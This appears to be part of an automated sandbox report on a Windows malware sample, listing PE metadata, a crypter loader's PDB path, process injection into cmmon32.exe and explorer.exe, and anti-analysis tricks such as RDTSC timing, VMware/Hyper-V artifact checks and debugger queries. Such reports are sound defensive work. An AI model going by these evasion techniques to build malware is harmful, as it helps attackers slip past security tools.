          Source: mvui1vY6Mo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: mvui1vY6Mo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: mvui1vY6Mo.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: mvui1vY6Mo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: cmmon32.pdb source: mvui1vY6Mo.exe, 00000002.00000002.746740818.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.708388219.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\0238f0732c6a40e5a54bccb37ef03c58\Loader\Project1\Release\Project1.pdb source: mvui1vY6Mo.exe
          Source: Binary string: cmmon32.pdbGCTL source: mvui1vY6Mo.exe, 00000002.00000002.746740818.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: mvui1vY6Mo.exe, 00000000.00000003.655268474.0000000003240000.00000004.00000001.sdmp, mvui1vY6Mo.exe, 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mvui1vY6Mo.exe, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.708388219.0000000005A00000.00000002.00000001.sdmp
          Source: mvui1vY6Mo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: mvui1vY6Mo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: mvui1vY6Mo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: mvui1vY6Mo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: mvui1vY6Mo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F1816 push ecx; ret 0_2_002F1829
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F1816 push ecx; ret 2_2_002F1829
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041B3C5 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041B47C push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041B412 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041B41B push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00414E34 push eax; iretd 2_2_00414E36
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00414F6B push ebp; retf 2_2_00414F6C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0188D0D1 push ecx; ret 2_2_0188D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0488D0D1 push ecx; ret 11_2_0488D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BB3C5 push eax; ret 11_2_008BB418
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BB41B push eax; ret 11_2_008BB482
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BB412 push eax; ret 11_2_008BB418
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BB47C push eax; ret 11_2_008BB482
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B4E34 push eax; iretd 11_2_008B4E36
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B4F6B push ebp; retf 11_2_008B4F6C
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000008A85F4 second address: 00000000008A85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000008A898E second address: 00000000008A8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6392Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F431C FindFirstFileExW,0_2_002F431C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F431C FindFirstFileExW,2_2_002F431C
          Source: explorer.exe, 00000004.00000000.704668581.0000000004710000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.689957122.000000000FD60000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.674578676.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.680786469.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.675830821.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.680786469.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cmmon32.exe, 0000000B.00000002.915231564.0000000000C47000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.680948462.000000000A716000.00000004.00000001.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.671975391.0000000004755000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.674578676.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.680948462.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.674578676.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.681026627.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.674578676.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00409B30 LdrLoadDll,2_2_00409B30
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F3D62 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002F3D62
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_00304C25 mov eax, dword ptr fs:[00000030h]0_2_00304C25
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F2E0B mov eax, dword ptr fs:[00000030h]0_2_002F2E0B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_011306DA mov eax, dword ptr fs:[00000030h]0_2_011306DA
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_0113099F mov eax, dword ptr fs:[00000030h]0_2_0113099F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_011309DE mov eax, dword ptr fs:[00000030h]0_2_011309DE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_011308EE mov eax, dword ptr fs:[00000030h]0_2_011308EE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_01130A1C mov eax, dword ptr fs:[00000030h]0_2_01130A1C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F2E0B mov eax, dword ptr fs:[00000030h]2_2_002F2E0B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186A185 mov eax, dword ptr fs:[00000030h]2_2_0186A185
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185C182 mov eax, dword ptr fs:[00000030h]2_2_0185C182
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862581 mov eax, dword ptr fs:[00000030h]2_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862581 mov eax, dword ptr fs:[00000030h]2_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862581 mov eax, dword ptr fs:[00000030h]2_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862581 mov eax, dword ptr fs:[00000030h]2_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h]2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h]2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h]2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h]2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h]2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862990 mov eax, dword ptr fs:[00000030h]2_2_01862990
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186FD9B mov eax, dword ptr fs:[00000030h]2_2_0186FD9B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186FD9B mov eax, dword ptr fs:[00000030h]2_2_0186FD9B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018661A0 mov eax, dword ptr fs:[00000030h]2_2_018661A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018661A0 mov eax, dword ptr fs:[00000030h]2_2_018661A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018635A1 mov eax, dword ptr fs:[00000030h]2_2_018635A1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B69A6 mov eax, dword ptr fs:[00000030h]2_2_018B69A6
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01861DB5 mov eax, dword ptr fs:[00000030h]2_2_01861DB5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01861DB5 mov eax, dword ptr fs:[00000030h]2_2_01861DB5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01861DB5 mov eax, dword ptr fs:[00000030h]2_2_01861DB5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B51BE mov eax, dword ptr fs:[00000030h]2_2_018B51BE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B51BE mov eax, dword ptr fs:[00000030h]2_2_018B51BE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B51BE mov eax, dword ptr fs:[00000030h]2_2_018B51BE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B51BE mov eax, dword ptr fs:[00000030h]2_2_018B51BE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_019005AC mov eax, dword ptr fs:[00000030h]2_2_019005AC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_019005AC mov eax, dword ptr fs:[00000030h]2_2_019005AC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h]2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h]2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h]2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6DC9 mov ecx, dword ptr fs:[00000030h]2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h]2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h]2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183B1E1 mov eax, dword ptr fs:[00000030h]2_2_0183B1E1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183B1E1 mov eax, dword ptr fs:[00000030h]2_2_0183B1E1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183B1E1 mov eax, dword ptr fs:[00000030h]2_2_0183B1E1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018C41E8 mov eax, dword ptr fs:[00000030h]2_2_018C41E8
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184D5E0 mov eax, dword ptr fs:[00000030h]2_2_0184D5E0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184D5E0 mov eax, dword ptr fs:[00000030h]2_2_0184D5E0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FFDE2 mov eax, dword ptr fs:[00000030h]2_2_018FFDE2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FFDE2 mov eax, dword ptr fs:[00000030h]2_2_018FFDE2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FFDE2 mov eax, dword ptr fs:[00000030h]2_2_018FFDE2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FFDE2 mov eax, dword ptr fs:[00000030h]2_2_018FFDE2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018E8DF1 mov eax, dword ptr fs:[00000030h]2_2_018E8DF1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839100 mov eax, dword ptr fs:[00000030h]2_2_01839100
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839100 mov eax, dword ptr fs:[00000030h]2_2_01839100
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839100 mov eax, dword ptr fs:[00000030h]2_2_01839100
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01908D34 mov eax, dword ptr fs:[00000030h]2_2_01908D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01854120 mov eax, dword ptr fs:[00000030h]2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01854120 mov eax, dword ptr fs:[00000030h]2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01854120 mov eax, dword ptr fs:[00000030h]2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01854120 mov eax, dword ptr fs:[00000030h]2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01854120 mov ecx, dword ptr fs:[00000030h]2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h]2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183AD30 mov eax, dword ptr fs:[00000030h]2_2_0183AD30
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FE539 mov eax, dword ptr fs:[00000030h]2_2_018FE539
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186513A mov eax, dword ptr fs:[00000030h]2_2_0186513A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186513A mov eax, dword ptr fs:[00000030h]2_2_0186513A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018BA537 mov eax, dword ptr fs:[00000030h]2_2_018BA537
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01864D3B mov eax, dword ptr fs:[00000030h]2_2_01864D3B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01864D3B mov eax, dword ptr fs:[00000030h]2_2_01864D3B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01864D3B mov eax, dword ptr fs:[00000030h]2_2_01864D3B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185B944 mov eax, dword ptr fs:[00000030h]2_2_0185B944
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185B944 mov eax, dword ptr fs:[00000030h]2_2_0185B944
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01873D43 mov eax, dword ptr fs:[00000030h]2_2_01873D43
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B3540 mov eax, dword ptr fs:[00000030h]2_2_018B3540
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01857D50 mov eax, dword ptr fs:[00000030h]2_2_01857D50
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183C962 mov eax, dword ptr fs:[00000030h]2_2_0183C962
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183B171 mov eax, dword ptr fs:[00000030h]2_2_0183B171
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183B171 mov eax, dword ptr fs:[00000030h]2_2_0183B171
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185C577 mov eax, dword ptr fs:[00000030h]2_2_0185C577
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185C577 mov eax, dword ptr fs:[00000030h]2_2_0185C577
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839080 mov eax, dword ptr fs:[00000030h]2_2_01839080
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B3884 mov eax, dword ptr fs:[00000030h]2_2_018B3884
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B3884 mov eax, dword ptr fs:[00000030h]2_2_018B3884
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184849B mov eax, dword ptr fs:[00000030h]2_2_0184849B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h]2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h]2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h]2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h]2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h]2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h]2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018790AF mov eax, dword ptr fs:[00000030h]2_2_018790AF
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186F0BF mov ecx, dword ptr fs:[00000030h]2_2_0186F0BF
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186F0BF mov eax, dword ptr fs:[00000030h]2_2_0186F0BF
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186F0BF mov eax, dword ptr fs:[00000030h]2_2_0186F0BF
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01908CD6 mov eax, dword ptr fs:[00000030h]2_2_01908CD6
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h]2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CB8D0 mov ecx, dword ptr fs:[00000030h]2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h]2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h]2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h]2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h]2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018358EC mov eax, dword ptr fs:[00000030h]2_2_018358EC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F14FB mov eax, dword ptr fs:[00000030h]2_2_018F14FB
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6CF0 mov eax, dword ptr fs:[00000030h]2_2_018B6CF0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6CF0 mov eax, dword ptr fs:[00000030h]2_2_018B6CF0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6CF0 mov eax, dword ptr fs:[00000030h]2_2_018B6CF0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6C0A mov eax, dword ptr fs:[00000030h]2_2_018B6C0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6C0A mov eax, dword ptr fs:[00000030h]2_2_018B6C0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6C0A mov eax, dword ptr fs:[00000030h]2_2_018B6C0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018B6C0A mov eax, dword ptr fs:[00000030h]2_2_018B6C0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01904015 mov eax, dword ptr fs:[00000030h]2_2_01904015
